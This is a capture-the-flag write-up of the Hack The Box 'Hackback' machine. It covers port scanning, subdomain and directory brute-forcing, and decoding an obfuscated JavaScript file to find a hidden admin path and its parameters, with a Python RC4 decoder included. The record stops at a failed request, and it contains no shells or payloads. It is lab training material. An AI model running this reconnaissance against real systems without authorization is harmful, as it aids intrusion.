Hack The Box - Hackback

Quick Summary

Hey guys, today Hackback retired and here's my write-up about it. Hackback was a very hard machine full of different steps and rabbit holes. It's a Windows machine and its IP is 10.10.10.128; I added it to /etc/hosts as hackback.htb. Let's jump right in!

Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC hackback.htb

We got two HTTP ports, 80 and 6666. I also ran a full scan but we'll get to that later.

HTTP

I checked both ports; on 80 there was this donkey image :

I ran gobuster and it got nothing.
I couldn’t send a request to port 6666 from the browser so I used curl :

root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/ 
"Missing Command!"

It says "Missing Command!"
So I tried /help :

root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/help
"hello,proc,whoami,list,info,services,netsat,ipconfig"

It returned a list of what commands we can use. /whoami lists information about the user running this service, not really important. /list lists the files in the current directory :

root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/list
[
{
"Name": "aspnet_client",
"length": null
},
{
"Name": "default",
"length": null
},
{
"Name": "new_phish",
"length": null
},
{
"Name": "http.ps1",
"Length": 1867
},
{
"Name": "iisstart.htm",
"Length": 703
},
{
"Name": "iisstart.png",
"Length": 99710
}
]

/info prints system information, we might need that :

root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/info
{
"WindowsBuildLabEx": "17763.1.amd64fre.rs5_release.180914-1434",
"WindowsCurrentVersion": "6.3",
"WindowsEditionId": "ServerStandard",
"WindowsInstallationType": "Server",
"WindowsInstallDateFromRegistry": "\/Date(1542436874000)\/",
"WindowsProductId": "00429-00520-27817-AA520",
"WindowsProductName": "Windows Server 2019 Standard",
"WindowsRegisteredOrganization": "",
"WindowsRegisteredOwner": "Windows User",
"WindowsSystemRoot": "C:\\Windows",
"WindowsVersion": "1809",
"BiosCharacteristics": null,
"BiosBIOSVersion": null,
"BiosBuildNumber": null,
"BiosCaption": null,
"BiosCodeSet": null,
"BiosCurrentLanguage": null,
"BiosDescription": null,
"BiosEmbeddedControllerMajorVersion": null,
"BiosEmbeddedControllerMinorVersion": null,
"BiosFirmwareType": null,
"BiosIdentificationCode": null,
"BiosInstallableLanguages": null,
"BiosInstallDate": null,
"BiosLanguageEdition": null,
"BiosListOfLanguages": null,
"BiosManufacturer": null,
"BiosName": null,
"BiosOtherTargetOS": null,
"BiosPrimaryBIOS": null,
"BiosReleaseDate": null,
"BiosSeralNumber": null,
"BiosSMBIOSBIOSVersion": null,
"BiosSMBIOSMajorVersion": null,
"BiosSMBIOSMinorVersion": null,
"BiosSMBIOSPresent": null,
"BiosSoftwareElementState": null,
"BiosStatus": null,
"BiosSystemBiosMajorVersion": null,
"BiosSystemBiosMinorVersion": null,
"BiosTargetOperatingSystem": null,
"BiosVersion": null,
"CsAdminPasswordStatus": null,
"CsAutomaticManagedPagefile": null,
"CsAutomaticResetBootOption": null,
"CsAutomaticResetCapability": null,
"CsBootOptionOnLimit": null,
"CsBootOptionOnWatchDog": null,
"CsBootROMSupported": null,
"CsBootStatus": null,
"CsBootupState": null,
"CsCaption": null,
"CsChassisBootupState": null,
"CsChassisSKUNumber": null,
"CsCurrentTimeZone": null,
"CsDaylightInEffect": null,
"CsDescription": null,
"CsDNSHostName": null,
"CsDomain": null,
"CsDomainRole": null,
"CsEnableDaylightSavingsTime": null,
"CsFrontPanelResetStatus": null,
"CsHypervisorPresent": null,
"CsInfraredSupported": null,
"CsInitialLoadInfo": null,
"CsInstallDate": null,
"CsKeyboardPasswordStatus": null,
"CsLastLoadInfo": null,
"CsManufacturer": null,
"CsModel": null,
"CsName": null,
"CsNetworkAdapters": null,
"CsNetworkServerModeEnabled": null,
"CsNumberOfLogicalProcessors": null,
"CsNumberOfProcessors": null,
"CsProcessors": null,
"CsOEMStringArray": null,
"CsPartOfDomain": null,
"CsPauseAfterReset": null,
"CsPCSystemType": null,
"CsPCSystemTypeEx": null,
"CsPowerManagementCapabilities": null,
"CsPowerManagementSupported": null,
"CsPowerOnPasswordStatus": null,
"CsPowerState": null,
"CsPowerSupplyState": null,
"CsPrimaryOwnerContact": null,
"CsPrimaryOwnerName": null,
"CsResetCapability": null,
"CsResetCount": null,
"CsResetLimit": null,
"CsRoles": null,
"CsStatus": null,
"CsSupportContactDescription": null,
"CsSystemFamily": null,
"CsSystemSKUNumber": null,
"CsSystemType": null,
"CsThermalState": null,
"CsTotalPhysicalMemory": null,
"CsPhyicallyInstalledMemory": null,
"CsUserName": null,
"CsWakeUpType": null,
"CsWorkgroup": null,
"OsName": null,
"OsType": null,
"OsOperatingSystemSKU": null,
"OsVersion": null,
"OsCSDVersion": null,
"OsBuildNumber": null,
"OsHotFixes": null,
"OsBootDevice": null,
"OsSystemDevice": null,
"OsSystemDirectory": null,
"OsSystemDrive": null,
"OsWindowsDirectory": null,
"OsCountryCode": null,
"OsCurrentTimeZone": null,
"OsLocaleID": null,
"OsLocale": null,
"OsLocalDateTime": null,
"OsLastBootUpTime": null,
"OsUptime": null,
"OsBuildType": null,
"OsCodeSet": null,
"OsDataExecutionPreventionAvailable": null,
"OsDataExecutionPrevention32BitApplications": null,
"OsDataExecutionPreventionDrivers": null,
"OsDataExecutionPreventionSupportPolicy": null,
"OsDebug": null,
"OsDistributed": null,
"OsEncryptionLevel": null,
"OsForegroundApplicationBoost": null,
"OsTotalVisibleMemorySize": null,
"OsFreePhysicalMemory": null,
"OsTotalVirtualMemorySize": null,
"OsFreeVirtualMemory": null,
"OsInUseVirtualMemory": null,
"OsTotalSwapSpaceSize": null,
"OsSizeStoredInPagingFiles": null,
"OsFreeSpaceInPagingFiles": null,
"OsPagingFiles": null,
"OsHardwareAbstractionLayer": null,
"OsInstallDate": null,
"OsManufacturer": null,
"OsMaxNumberOfProcesses": null,
"OsMaxProcessMemorySize": null,
"OsMuiLanguages": null,
"OsNumberOfLicensedUsers": null,
"OsNumberOfProcesses": null,
"OsNumberOfUsers": null,
"OsOrganization": null,
"OsArchitecture": null,
"OsLanguage": null,
"OsProductSuites": null,
"OsOtherTypeDescription": null,
"OsPAEEnabled": null,
"OsPortableOperatingSystem": null,
"OsPrimary": null,
"OsProductType": null,
"OsRegisteredUser": null,
"OsSerialNumber": null,
"OsServicePackMajorVersion": null,
"OsServicePackMinorVersion": null,
"OsStatus": null,
"OsSuites": null,
"OsServerLevel": 4,
"KeyboardLayout": null,
"TimeZone": "(UTC-08:00) Pacific Time (US \u0026 Canada)",
"LogonServer": null,
"PowerPlatformRole": 1,
"HyperVisorPresent": null,
"HyperVRequirementDataExecutionPreventionAvailable": null,
"HyperVRequirementSecondLevelAddressTranslation": null,
"HyperVRequirementVirtualizationFirmwareEnabled": null,
"HyperVRequirementVMMonitorModeExtensions": null,
"DeviceGuardSmartStatus": 0,
"DeviceGuardRequiredSecurityProperties": null,
"DeviceGuardAvailableSecurityProperties": null,
"DeviceGuardSecurityServicesConfigured": null,
"DeviceGuardSecurityServicesRunning": null,
"DeviceGuardCodeIntegrityPolicyEnforcementStatus": null,
"DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus": null
}

/services lists the services, that’s also important and we might need it later :

root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/services
[
{
"name": "AJRouter",
"startname": "NT AUTHORITY\\LocalService",
"displayname": "AllJoyn Router Service",
"status": "OK"
},
{
"name": "ALG",
"startname": "NT AUTHORITY\\LocalService",
"displayname": "Application Layer Gateway Service",
"status": "OK"
},
{
"name": "AppHostSvc",
"startname": "localSystem",
"displayname": "Application Host Helper Service",
"status": "OK"
},

-------------------
Removed Long Output
-------------------

{
"name": "WpnService",
"startname": "LocalSystem",
"displayname": "Windows Push Notifications System Service",
"status": "OK"
},
{
"name": "WSearch",
"startname": "LocalSystem",
"displayname": "Windows Search",
"status": "OK"
},
{
"name": "wuauserv",
"startname": "LocalSystem",
"displayname": "Windows Update",
"status": "OK"
}
]

/netstat lists the listening ports; we can check that when we need to know about internal services, but for now we will just ignore it. The rest of the commands don't do anything useful. I tried to exploit this service since it's executing system commands, however it wasn't possible.
I used wfuzz with subdomains-top1million-5000.txt from seclists to enumerate any possible subdomains :

root@kali:~/Desktop/HTB/boxes/hackback# wfuzz --hc 614 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.hackback.htb" http://10.10.10.128

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****
Target: http://10.10.10.128/
Total requests: 4997

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000007: C=200 33 L 54 W 614 Ch "webdisk"
000008: C=200 33 L 54 W 614 Ch "pop"
000001: C=200 33 L 54 W 614 Ch "www"
000002: C=200 33 L 54 W 614 Ch "mail"
000005: C=200 33 L 54 W 614 Ch "webmail"
000006: C=200 33 L 54 W 614 Ch "smtp"
000009: C=200 33 L 54 W 614 Ch "cpanel"
000010: C=200 33 L 54 W 614 Ch "whm"
000003: C=200 33 L 54 W 614 Ch "ftp"
000004: C=200 33 L 54 W 614 Ch "localhost"
000011: C=200 33 L 54 W 614 Ch "ns1"
000013: C=200 33 L 54 W 614 Ch "autodiscover"
000014: C=200 33 L 54 W 614 Ch "autoconfig"
000015: C=200 33 L 54 W 614 Ch "ns"
000016: C=200 33 L 54 W 614 Ch "test"
000012: C=200 33 L 54 W 614 Ch "ns2"
000017: C=200 33 L 54 W 614 Ch "m"
000020: C=200 33 L 54 W 614 Ch "www2"
000021: C=200 33 L 54 W 614 Ch "ns3"
000018: C=200 33 L 54 W 614 Ch "blog"
000019: C=200 33 L 54 W 614 Ch "dev"
000023: C=200 33 L 54 W 614 Ch "forum"
000022: C=200 33 L 54 W 614 Ch "pop3"
000026: C=200 33 L 54 W 614 Ch "vpn"
000025: C=200 33 L 54 W 614 Ch "mail2"
000024: C=200 27 L 66 W 825 Ch "admin"
000027: C=200 33 L 54 W 614 Ch "mx"

^C
Finishing pending requests...

admin gave a different response length, I added it to /etc/hosts :

It had this login form :

Which actually didn’t do anything :

<form action="#" method="post">
<!-- USERNAME INPUT -->
<label for="username">Username</label>
<input type="text" placeholder="Enter Username">
<!-- PASSWORD INPUT -->
<label for="password">Password</label>
<input type="password" placeholder="Enter Password">
<input type="submit" value="Log In">
<a href="lost">Lost your Password?</a>
<a href="signup">Don't have An account?</a>
</form>

Also the password reset and sign-up pages are non-existent :

By looking at the page source :

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Admin Login</title>
<link rel="stylesheet" href="/css/master.css">
<!-- <script SRC="js/.js"></script> -->
</head>
<body>

<div class="login-box">
<img src="img/logo.png" class="avatar" alt="Avatar Image">
<h1>Login Here</h1>
<form action="#" method="post">
<!-- USERNAME INPUT -->
<label for="username">Username</label>
<input type="text" placeholder="Enter Username">
<!-- PASSWORD INPUT -->
<label for="password">Password</label>
<input type="password" placeholder="Enter Password">
<input type="submit" value="Log In">
<a href="lost">Lost your Password?</a>
<a href="signup">Don't have An account?</a>
</form>
</div>
</body>
</html>

We notice this weird comment : <!-- <script SRC="js/.js"></script> -->
However /js gave a 403 :

I ran gobuster with /usr/share/wordlists/dirb/common.txt and .js extension :

root@kali:~/Desktop/HTB/boxes/hackback# gobuster -u http://admin.hackback.htb/js/ -w /usr/share/wordlists/dirb/common.txt -x js
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://admin.hackback.htb/js/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : js
[+] Timeout : 10s
=====================================================
2019/07/05 09:37:16 Starting gobuster
=====================================================
/private.js (Status: 200)

Script Deobfuscation

By looking at private.js it’s not really what we expect a javascript file to be :

<script>
ine n=['\k57\k78\k49\k6n\k77\k72\k37\k44\k75\k73\k4s\k38\k47\k73\k4o\k76\k52\k77\k42\k2o\k77\k71\k33\k44\k75\k4q\k4o\k72\k77\k72\k4p\k44\k67\k63\k4s\k69\k77\k72\k59\k31\k4o\k45\k45\k67\k47\k38\k4o\k43\k77\k71\k37\k44\k6p\k38\k4o\k33','\k41\k63\k4s\k4q\k77\k71\k76\k44\k71\k51\k67\k43\k77\k34\k2s\k43\k74\k32\k6r\k44\k74\k4q\k4o\k68\k5n\k63\k4o\k44\k77\k71\k54\k43\k70\k54\k73\k79\k77\k37\k6r\k43\k68\k73\k4s\k51\k58\k4q\k4s\k35\k57\k38\k4o\k70\k44\k73\k4s\k74\k4r\k43\k44\k44\k76\k41\k6n\k43\k67\k79\k6o\k3q','\k77\k35\k48\k44\k72\k38\k4s\k37\k64\k44\k52\k6q\k4q\k4q\k4o\k4n\k77\k34\k6n\k44\k6p\k56\k52\k6r\k77\k72\k74\k37\k77\k37\k73\k30\k77\k6s\k31\k61\k77\k37\k73\k41\k51\k73\k4o\k73\k66\k73\k4s\k45\k77\k34\k58\k44\k73\k52\k6n\k43\k6p\k4q\k4s\k77\k46\k7n\k72\k43\k6q\k7n\k70\k76\k43\k41\k6n\k43\k75\k42\k7n\k44\k73\k73\k4o\k39\k46\k38\k4s\k34\k77\k71\k5n\k6r\k57\k73\k4o\k68'];(shapgvba(p,q){ine r=shapgvba(s){juvyr(--s){p['chfu'](p['fuvsg']());}};r(++q);}(n,0k66));ine o=shapgvba(p,q){p=p-0k0;ine r=n[p];vs(o['ZfHYzi']===haqrsvarq){(shapgvba(){ine s;gel{ine t=Shapgvba('erghea\k20(shapgvba()\k20'+'{}.pbafgehpgbe(\k22erghea\k20guvf\k22)(\k20)'+');');s=t();}pngpu(u){s=jvaqbj;}ine v='NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/=';s['ngbo']||(s['ngbo']=shapgvba(w){ine x=Fgevat(w)['ercynpr'](/=+$/,'');sbe(ine y=0k0,z,a,b=0k0,c='';a=x['puneNg'](b++);~a&&(z=y%0k4?z*0k40+a:a,y++%0k4)?c+=Fgevat['sebzPunePbqr'](0kss&z>>(-0k2*y&0k6)):0k0){a=v['vaqrkBs'](a);}erghea c;});}());ine d=shapgvba(e,q){ine g=[],h=0k0,i,j='',k='';e=ngbo(e);sbe(ine l=0k0,m=e['yratgu'];l<m;l++){k+='%'+('00'+e['punePbqrNg'](l)['gbFgevat'](0k10))['fyvpr'](-0k2);}e=qrpbqrHEVPbzcbarag(k);sbe(ine N=0k0;N<0k100;N++){g[N]=N;}sbe(N=0k0;N<0k100;N++){h=(h+g[N]+q['punePbqrNg'](N%q['yratgu']))%0k100;i=g[N];g[N]=g[h];g[h]=i;}N=0k0;h=0k0;sbe(ine O=0k0;O<e['yratgu'];O++){N=(N+0k1)%0k100;h=(h+g[N])%0k100;i=g[N];g[N]=g[h];g[h]=i;j+=Fgevat['sebzPunePbqr'](e['punePbqrNg'](O)^g[(g[N]+g[h])%0k100]);}erghea 
j;};o['BbNPpq']=d;o['dFYjTx']={};o['ZfHYzi']=!![];}ine P=o['dFYjTx'][p];vs(P===haqrsvarq){vs(o['cVwyDO']===haqrsvarq){o['cVwyDO']=!![];}r=o['BbNPpq'](r,q);o['dFYjTx'][p]=r;}ryfr{r=P;}erghea r;};ine k='\k53\k65\k63\k75\k72\k65\k20\k4p\k6s\k67\k69\k6r\k20\k42\k79\k70\k61\k73\k73';ine m=o('0k0','\k50\k5q\k53\k36');ine u=o('0k1','\k72\k37\k54\k59');ine l=o('0k2','\k44\k41\k71\k67');ine g='\k3s\k61\k63\k74\k69\k6s\k6r\k3q\k28\k73\k68\k6s\k77\k2p\k6p\k69\k73\k74\k2p\k65\k78\k65\k63\k2p\k69\k6r\k69\k74\k29';ine f='\k26\k73\k69\k74\k65\k3q\k28\k74\k77\k69\k74\k74\k65\k72\k2p\k70\k61\k79\k70\k61\k6p\k2p\k66\k61\k63\k65\k62\k6s\k6s\k6o\k2p\k68\k61\k63\k6o\k74\k68\k65\k62\k6s\k78\k29';ine v='\k26\k70\k61\k73\k73\k77\k6s\k72\k64\k3q\k2n\k2n\k2n\k2n\k2n\k2n\k2n\k2n';ine x='\k26\k73\k65\k73\k73\k69\k6s\k6r\k3q';ine j='\k4r\k6s\k74\k68\k69\k6r\k67\k20\k6q\k6s\k72\k65\k20\k74\k6s\k20\k73\k61\k79';
</script>

The first thing we notice is that it's not actually JS. ine n? That doesn't look like JS; most likely it's gonna be var a. v is the 22nd letter of the alphabet while i is the 9th, and 22 - 9 = 13.
So this script is ROT13 encoded. I used rot13.com to decode it :

var a=['\x57\x78\x49\x6a\x77\x72\x37\x44\x75\x73\x4f\x38\x47\x73\x4b\x76\x52\x77\x42\x2b\x77\x71\x33\x44\x75\x4d\x4b\x72\x77\x72\x4c\x44\x67\x63\x4f\x69\x77\x72\x59\x31\x4b\x45\x45\x67\x47\x38\x4b\x43\x77\x71\x37\x44\x6c\x38\x4b\x33','\x41\x63\x4f\x4d\x77\x71\x76\x44\x71\x51\x67\x43\x77\x34\x2f\x43\x74\x32\x6e\x44\x74\x4d\x4b\x68\x5a\x63\x4b\x44\x77\x71\x54\x43\x70\x54\x73\x79\x77\x37\x6e\x43\x68\x73\x4f\x51\x58\x4d\x4f\x35\x57\x38\x4b\x70\x44\x73\x4f\x74\x4e\x43\x44\x44\x76\x41\x6a\x43\x67\x79\x6b\x3d','\x77\x35\x48\x44\x72\x38\x4f\x37\x64\x44\x52\x6d\x4d\x4d\x4b\x4a\x77\x34\x6a\x44\x6c\x56\x52\x6e\x77\x72\x74\x37\x77\x37\x73\x30\x77\x6f\x31\x61\x77\x37\x73\x41\x51\x73\x4b\x73\x66\x73\x4f\x45\x77\x34\x58\x44\x73\x52\x6a\x43\x6c\x4d\x4f\x77\x46\x7a\x72\x43\x6d\x7a\x70\x76\x43\x41\x6a\x43\x75\x42\x7a\x44\x73\x73\x4b\x39\x46\x38\x4f\x34\x77\x71\x5a\x6e\x57\x73\x4b\x68'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x66));var b=function(c,d){c=c-0x0;var e=a[c];if(b['MsULmv']===undefined){(function(){var f;try{var g=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,d){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+d['charCodeAt'](A%d['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return 
w;};b['OoACcd']=q;b['qSLwGk']={};b['MsULmv']=!![];}var C=b['qSLwGk'][c];if(C===undefined){if(b['pIjlQB']===undefined){b['pIjlQB']=!![];}e=b['OoACcd'](e,d);b['qSLwGk'][c]=e;}else{e=C;}return e;};var x='\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73';var z=b('0x0','\x50\x5d\x53\x36');var h=b('0x1','\x72\x37\x54\x59');var y=b('0x2','\x44\x41\x71\x67');var t='\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x28\x73\x68\x6f\x77\x2c\x6c\x69\x73\x74\x2c\x65\x78\x65\x63\x2c\x69\x6e\x69\x74\x29';var s='\x26\x73\x69\x74\x65\x3d\x28\x74\x77\x69\x74\x74\x65\x72\x2c\x70\x61\x79\x70\x61\x6c\x2c\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2c\x68\x61\x63\x6b\x74\x68\x65\x62\x6f\x78\x29';var i='\x26\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a';var k='\x26\x73\x65\x73\x73\x69\x6f\x6e\x3d';var w='\x4e\x6f\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20\x74\x6f\x20\x73\x61\x79';

Now this is better. I also used a js beautifier to make it easily readable :

var a = ['\x57\x78\x49\x6a\x77\x72\x37\x44\x75\x73\x4f\x38\x47\x73\x4b\x76\x52\x77\x42\x2b\x77\x71\x33\x44\x75\x4d\x4b\x72\x77\x72\x4c\x44\x67\x63\x4f\x69\x77\x72\x59\x31\x4b\x45\x45\x67\x47\x38\x4b\x43\x77\x71\x37\x44\x6c\x38\x4b\x33', '\x41\x63\x4f\x4d\x77\x71\x76\x44\x71\x51\x67\x43\x77\x34\x2f\x43\x74\x32\x6e\x44\x74\x4d\x4b\x68\x5a\x63\x4b\x44\x77\x71\x54\x43\x70\x54\x73\x79\x77\x37\x6e\x43\x68\x73\x4f\x51\x58\x4d\x4f\x35\x57\x38\x4b\x70\x44\x73\x4f\x74\x4e\x43\x44\x44\x76\x41\x6a\x43\x67\x79\x6b\x3d', '\x77\x35\x48\x44\x72\x38\x4f\x37\x64\x44\x52\x6d\x4d\x4d\x4b\x4a\x77\x34\x6a\x44\x6c\x56\x52\x6e\x77\x72\x74\x37\x77\x37\x73\x30\x77\x6f\x31\x61\x77\x37\x73\x41\x51\x73\x4b\x73\x66\x73\x4f\x45\x77\x34\x58\x44\x73\x52\x6a\x43\x6c\x4d\x4f\x77\x46\x7a\x72\x43\x6d\x7a\x70\x76\x43\x41\x6a\x43\x75\x42\x7a\x44\x73\x73\x4b\x39\x46\x38\x4f\x34\x77\x71\x5a\x6e\x57\x73\x4b\x68'];
(function(c, d) {
var e = function(f) {
while (--f) {
c['push'](c['shift']());
}
};
e(++d);
}(a, 0x66));
var b = function(c, d) {
c = c - 0x0;
var e = a[c];
if (b['MsULmv'] === undefined) {
(function() {
var f;
try {
var g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
f = g();
} catch (h) {
f = window;
}
var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
f['atob'] || (f['atob'] = function(j) {
var k = String(j)['replace'](/=+$/, '');
for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o++); ~n && (m = l % 0x4 ? m * 0x40 + n : n, l++ % 0x4) ? p += String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
n = i['indexOf'](n);
}
return p;
});
}());
var q = function(r, d) {
var t = [],
u = 0x0,
v, w = '',
x = '';
r = atob(r);
for (var y = 0x0, z = r['length']; y < z; y++) {
x += '%' + ('00' + r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);
}
r = decodeURIComponent(x);
for (var A = 0x0; A < 0x100; A++) {
t[A] = A;
}
for (A = 0x0; A < 0x100; A++) {
u = (u + t[A] + d['charCodeAt'](A % d['length'])) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
}
A = 0x0;
u = 0x0;
for (var B = 0x0; B < r['length']; B++) {
A = (A + 0x1) % 0x100;
u = (u + t[A]) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
w += String['fromCharCode'](r['charCodeAt'](B) ^ t[(t[A] + t[u]) % 0x100]);
}
return w;
};
b['OoACcd'] = q;
b['qSLwGk'] = {};
b['MsULmv'] = !![];
}
var C = b['qSLwGk'][c];
if (C === undefined) {
if (b['pIjlQB'] === undefined) {
b['pIjlQB'] = !![];
}
e = b['OoACcd'](e, d);
b['qSLwGk'][c] = e;
} else {
e = C;
}
return e;
};
var x = '\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73';
var z = b('0x0', '\x50\x5d\x53\x36');
var h = b('0x1', '\x72\x37\x54\x59');
var y = b('0x2', '\x44\x41\x71\x67');
var t = '\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x28\x73\x68\x6f\x77\x2c\x6c\x69\x73\x74\x2c\x65\x78\x65\x63\x2c\x69\x6e\x69\x74\x29';
var s = '\x26\x73\x69\x74\x65\x3d\x28\x74\x77\x69\x74\x74\x65\x72\x2c\x70\x61\x79\x70\x61\x6c\x2c\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2c\x68\x61\x63\x6b\x74\x68\x65\x62\x6f\x78\x29';
var i = '\x26\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a';
var k = '\x26\x73\x65\x73\x73\x69\x6f\x6e\x3d';
var w = '\x4e\x6f\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20\x74\x6f\x20\x73\x61\x79';

As you can see it's still heavily obfuscated. I solved this by pasting the code in the JS console: it does the magic happening in these functions, then we can just read the variables at the bottom of the script : x z h y t s i k w

We got this message :

Secure Login Bypass
Remember the secret path is
2bb6916122f1da34dcd916421e531578
Just in case I loose access to the admin panel
?action=(show,list,exec,init)
&site=(twitter,paypal,facebook,hackthebox)
&password=*****
&session=
Nothing more to say

Going to that path only caused a redirect, so we need to enumerate more.
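The decoder routine in the script is only base64 followed by RC4, so the strings can be recovered offline without pasting untrusted JavaScript into a browser console. The Python below is an added example (not part of the original write-up or of the box): it reimplements the script's q() function and applies it to the three array entries with the keys passed to b(); the base64 strings are the \x-escaped array literals above written out as plain text.

```python
import base64

# The three entries of the string array `a` in private.js, with the \x escapes
# written out as plain text (they are ordinary base64).
STRING_ARRAY = [
    "WxIjwr7DusO8GsKvRwB+wq3DuMKrwrLDgcOiwrY1KEEgG8KCwq7Dl8K3",
    "AcOMwqvDqQgCw4/Ct2nDtMKhZcKDwqTCpTsyw7nChsOQXMO5W8KpDsOtNCDDvAjCgyk=",
    "w5HDr8O7dDRmMMKJw4jDlVRnwrt7w7s0wo1aw7sAQsKsfsOEw4XDsRjClMOwFzrCmzpvCAjCuBzDssK9F8O4wqZnWsKh",
]

# The (index, key) pairs passed to b() at the bottom of the script:
# b('0x0', '\x50\x5d\x53\x36'), b('0x1', '\x72\x37\x54\x59'), b('0x2', '\x44\x41\x71\x67')
LOOKUPS = [(0, "P]S6"), (1, "r7TY"), (2, "DAqg")]


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA), identical to the two loops inside q() in the script."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rotate_array(arr: list, shifts: int) -> list:
    """The IIFE at the top runs arr.push(arr.shift()) once per while(--f) iteration.
    e(++d) with d = 0x66 means f starts at 0x67, so there are 0x66 shifts."""
    arr = list(arr)
    for _ in range(shifts):
        arr.append(arr.pop(0))
    return arr


def decode_string(encoded: str, key: str) -> str:
    """Reproduce q(r, d): atob -> percent-encode every byte -> decodeURIComponent -> RC4.

    The middle two steps amount to a UTF-8 decode; the obfuscator stored each RC4
    ciphertext byte as one code point, so every decoded character is <= 0xFF.
    """
    raw = base64.b64decode(encoded)
    code_points = [ord(ch) for ch in raw.decode("utf-8")]
    if any(cp > 0xFF for cp in code_points):
        raise ValueError("not an RC4 string-array entry: code point above 0xFF")
    plain = rc4(key.encode("latin-1"), bytes(code_points))
    return plain.decode("latin-1")


def recover_message() -> list:
    """Decode the array the way the script does at load time and return the lines
    in the order the write-up reads them (x, then z/h/y via b())."""
    arr = rotate_array(STRING_ARRAY, 0x66)     # 0x66 % 3 == 0: order is unchanged here
    lines = ["\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73"]
    for index, key in LOOKUPS:
        lines.append(decode_string(arr[index], key))
    return lines


if __name__ == "__main__":
    for line in recover_message():
        print(line)
```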

Accessing the Secret Path

From the secret message we know what parameters it’s expecting us to send : (?action=&site=&password=&session=). This is probably gonna be a php page. So I ran gobuster on that path with the same wordlist I used before and .php extension :

root@kali:~/Desktop/HTB/boxes/hackback# gobuster -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/ -w /usr/share/wordlists/dirb/common.txt -x php

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
=====================================================
2019/07/05 10:08:09 Starting gobuster
=====================================================
/webadmin.php (Status: 302)

Great we got webadmin.php, I tried again and now I didn’t get a redirect :

root@kali:~/Desktop/HTB/boxes/hackback# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=test&session='
Wrong secret key!

